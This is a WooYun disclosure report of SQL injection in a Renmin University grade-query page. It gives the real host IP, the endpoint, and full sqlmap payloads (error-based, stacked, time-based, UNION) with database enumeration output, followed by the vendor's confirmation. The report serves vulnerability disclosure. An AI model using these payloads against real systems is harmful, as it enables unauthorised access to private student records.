乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-12: 细节已通知厂商并且等待厂商处理中 2015-03-13: 厂商已经确认,细节仅向厂商公开 2015-03-23: 细节向核心白帽子及相关领域专家公开 2015-04-02: 细节向普通白帽子公开 2015-04-12: 细节向实习白帽子公开 2015-04-26: 细节向公众公开
中国人民大学某站点sql注射漏洞
1#由于dns域传送漏洞得到中国人民大学站点域名,都是大学站点漏洞多,随手了一个的确存在漏洞。在站点出点击成绩查询,进入到成绩查询系统:
一看到这页面猜测存在sql注射,测试确实存在
2#抓包用sqlmap注射信息
http://202.112.126.89:80/cjcx/cjcx_new.asp (POST)sqlmap identified the following injection points with a total of 320 HTTP(s) requests:---Parameter: bh (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: bh=SZDo') AND 6025=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6025=6025) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('BxSc'='BxSc&sfzh= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: bh=SZDo');WAITFOR DELAY '0:0:5'--&sfzh= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: bh=SZDo') WAITFOR DELAY '0:0:5'--&sfzh= Type: UNION query Title: Generic UNION query (NULL) - 104 columns Payload: bh=SZDo') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(111)+CHAR(79)+CHAR(105)+CHAR(88)+CHAR(97)+CHAR(66)+CHAR(111)+CHAR(68)+CHAR(71)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &sfzh=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: bh (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: bh=SZDo') AND 6025=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6025=6025) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('BxSc'='BxSc&sfzh= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: bh=SZDo');WAITFOR DELAY '0:0:5'--&sfzh= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: bh=SZDo') WAITFOR DELAY '0:0:5'--&sfzh= Type: UNION query Title: Generic UNION query (NULL) - 104 columns Payload: bh=SZDo') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(111)+CHAR(79)+CHAR(105)+CHAR(88)+CHAR(97)+CHAR(66)+CHAR(111)+CHAR(68)+CHAR(71)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &sfzh=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008current user is DBA: Falsecurrent database: 'yanyuan'available databases [6]:[*] master[*] model[*] msdb[*] tempdb[*] wb[*] yanyuan
current user is DBA: Falsecurrent database: 'yanyuan'available databases [6]:[*] master[*] model[*] msdb[*] tempdb[*] wb[*] yanyuan
过滤,最好重新开发系统
危害等级:高
漏洞Rank:15
确认时间:2015-03-13 09:48
非常感谢!已通知学院处理!
暂无